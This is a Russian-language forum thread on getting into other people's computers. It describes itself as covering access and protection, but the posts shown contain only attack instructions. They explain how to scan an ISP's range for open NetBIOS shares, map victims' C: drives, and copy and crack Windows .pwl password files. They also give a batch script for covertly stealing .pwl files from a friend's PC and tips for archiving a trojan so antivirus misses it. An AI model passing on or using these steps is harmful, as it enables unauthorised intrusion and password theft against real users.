Доступ на удаленную машину

Поскольку многих интересует тема доступа на удаленную машину по сети, возникла идея написать сборную статью по методам поиска "расшаренных ресурсов" и защиты своих ресурсов от доступа извне.
Как исходный вариант статьи прилагается заметка CrAzY MAN.
Просьба писать свои замечания, дополнения, методы.
Наиболее логичные/полные/интересные замечания будут включены в статью (с указанием авторства разумеется))).

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">
Начну я с того что в сети (как под ногами) валяется очень много хороших вещей, которые с первого взгляда не видны. Но на самом деле надо всего лишь раскрыть глаза пошире и увидеть всё это. Попробую помочь раскрыть вам глаза с помощью некоторых неплохих прог. Итак что может валятся в сети? Многое, но мы остановимся пока на халявном инете. Что надо совершить для достижения этой цели? Всего лишь несколько шагов! Те у кого стоит Win2000 или NT шаг первый могут опустить, так как у них сетевое окружение настроено по умолчанию так как надо.
1. Первое что вам надо сделать так это настроить свой Масдай 9х!!!Для этого в свойствах сетевого окружения установить пакет под названием &quot;Клиент для сетей Микрософт&quot;, для совсем уж начинающих обясняю: берём открываем &quot;Панель управления&quot; находим там значок &quot;Сеть&quot; открываем и нажимаем кнопку &quot;Добавить&quot; выбираем &quot;Клиент&quot;, опять &quot;Добавить&quot;, далее &quot;Майкрософт&quot; и выбираем нужного клиента.

2. Тэээкс Масдай мы настроили... Двигаемся дальше Скачиваем tcp сканер &quot;R3x&quot;, открываем и в верхнем окне для ввода пишем ip своего провайдера (можно и любого другого с открытым доступом в зону NetBios но начнём со своего, то есть просто пишем свой ip) в нашем случае возьмём 192.168.231.72 и нажимаем кнопку слева 1..254. Прога выстраевает диапазон ip (то есть в в верхнем окне появится 192.168.231.1, а в нижнем 192.168.231.254) и после этого вы жмёте Scan и в считаные секунды софтина выдаёт компы с открытым 139 портом. Выбираем любой (допустим 192.168.231.56) и кликаем по нему правой кнопкой мыши. Вылезает контекстное меню, в нём выбираем &quot;Request share list&quot; и получаем список расшареных дисков. Если там есть диск &quot;С&quot; то хлопайти в ладоши, вы нашли то что надо!!!

3. Шаг третий. На рабочем столе у вас есть значёк &quot;Сетевое окружение&quot;. Щёлкаем по нему правой кнопкой и в контексте выбираем &quot;Подключить сетвой диск&quot;, нажимаем и получаем портянку где можно выбрать имя диска и путь к нему. В окошке для пути вписываем &quot; \\192.168.231.56\с &quot;, жмём ОК и теперь вы можете лазать по диску юзера как по своему собственному!!!

4. Открываем консоль (сеанс MS-DOs, Командная строка, не знаю как ещё назвать что бы вы поняли) и вводим команду &quot; copy X:\windows\*.pwl c:\Y &quot; где Х это имя подключеного диска, а Y это папка для файлов с паролями которую вы создали на своём диске &quot;с&quot;. Ура,юзверь во время не отконектился, мы получили его pwl, настало время пятогошага!!!

5. Дальше всё проще простого!!! Скачиваем прогу &quot;PWL tools&quot; и открываем в ней файлы украденые у глупого юзверя. Ну все что вы хотели получить теперь все пароли у вас...!

CrAzY MAN
[/QUOTE]<span id='postcolor'>

 

Изложенный метод, конечно интересен, но можно стырить пароль и не влезая в сеть
а просто нужен user, который имеет доступ в инет. Прийти к нему домой с прогой типа
та которую сейчас опишу... Открыть блокнот и написать туда следующее... Затем выбрать сохранить как с расширением .bat &nbsp; &nbsp; &nbsp; (Если у вашего &quot;товарища&quot; стоит windows xp, то эта прога работать не будет, да и пароли там не в этих файлах лежат...)

copy C:\windows\*.pwl
copy C:\win\*.pwl
copy C:\win98\*.pwl
copy C:\windows98\*.pwl
copy C:\win2000\*.pwl
copy C:\Windows2000\*.pwl
copy C:\WinMe\*.pwl
copy C:\WindowsMe\*.pwl

Затем скинуть себе на дискету, и притащить её на комп к твоему &quot;товарищу&quot;, и запустить под каким-нить тупым предлогом....
У вас на дискете окажется файл с паролями, но его нужно расшифровать., например с помощью &quot;PWL tools&quot;, или подобного расшифровщика pwl файлов.

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2 способ &quot;сетевой&quot; &nbsp;(Менее эффекетный)

Для начала понадобится сканер портов, существует большое количество программ предназначенных для этого действия или имеющих соответствующую встроенную функцию.
Разберу на примере &nbsp;Essential NetTools
Запустив программу перейдите на вкладку NBscan и в поле Starting IP adress введите начальный диапазон сканирования адресов (Примерно выглядит примерно так 101.190.87.01). А в поле Ending IP adress исправить последние два числа (в нашем случае это .01) на число 254. После нажатия кн. Start отобразится список компьютеров найденных в процессе сканирования. Теперь надо определить на какой мы сможем проникнуть а на какой нет, для этого в клолонке RS отображается состояние &quot;открыт ли доступ?&quot;. &nbsp;Выискиваем тех, у кого в этой коклонке стоит значение Yes &nbsp;(нас интерисуют только эти)

После нахождения компа с открытым доступом надо на на нём щёлкнуть правую кнопку и выбрать &quot;open computer&quot;, этот способ самый долгий и пока Вы доберётесь до вожделенного файла пользователь далее &quot;жертва&quot; может выйтти из сети и тогда всё придётся начинать сначала. Есть всё же вариант побыстрее, это щелкнув на иконке Мой компьютер или Моё сетевое окружение нажать на пункт меню подключить сетевой диск. Ввести в поле папка IP adress &quot;юзера&quot; например \\101.190.87.01\С где С метка диска с операционной системой на машине &quot;юзера&quot;. Теперь открываем Windows Commander (желательней версию посвежей) и открыть сетевой диск, папку Windows. Там это прoизойдёт намного быстрей или же вообще запустив сеанс MS DOS, и с помощью примерно следующих команд
C:\&gt;E: (где Е имя сетевого диска)
E:\&gt;cd windows
C:\WINDOWS&gt;dir *.pwl
том в устройстве Е не имеет метки.
Серийный номер диска: 361D-16D6

E:\WINDOWS

26.10.2002 154 730 ANTON.PWL (где ANTON.pwl цель кражи)
1 файл 730 байт
0 папок 7 351 648 256 свободного места

C:\WINDOWS&gt;copy ANTON.pwl С: (скачка нужного файла поролей)
Не копируйте в каталог Windows иначе в последствии файл будет потерен.
Как вы заметили красть придёться файл с расширением *.pwl который находится в папке Windows.
После копирования к себе на винчестер файла например ANTON.pwl завершить сеанс текущего пользователя и ввойти в систему под именем ANTON (ну или любое другое имя, указанное в pwl). ДЛЯ просмотра pwl нужны спец проги (например &quot;pwl tools&quot

 

Андрейnord! Пробовал сетевой способ, но при сканировании адресов моего провайдера был обнаружен только мой комп!!!

 

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (* V * @ января 17 2004,22:38)</td></tr><tr><td id="QUOTE">Андрейnord! Пробовал сетевой способ, но при сканировании адресов моего провайдера был обнаружен только мой комп!!![/QUOTE]<span id='postcolor'>
Скорее всего, твой пров опускает пакеты по биосу... Попробуй сменить провайдера.

 

Есть доступ на удаленную тачку юзером из группы wheel система Фря, как можно получить root'a?
Может немного оффтоп, но кто сталкивался с повышением прав доступа подскажите в какую сторону копать?

 

Да пацаны я тут читал что вы тут написали это так сказать просто тупой старый метод, лучше всего использовать трояны, если не сможете написать свои скачайте их откуда нить блага такие сайты еще пока живут у нас в рунете, идем далие, троян как известно если вы его скачали с нета он практически со 100% горантией будет палится антивирями, итак что надо делать дальше, берем трою архивируем её и всего делов а с архивом делаеш преписку 123 ну а дальше сам думай **** уше

 

А как всетаки можно зайти по аське на чужой компьютер и порыться там на винте?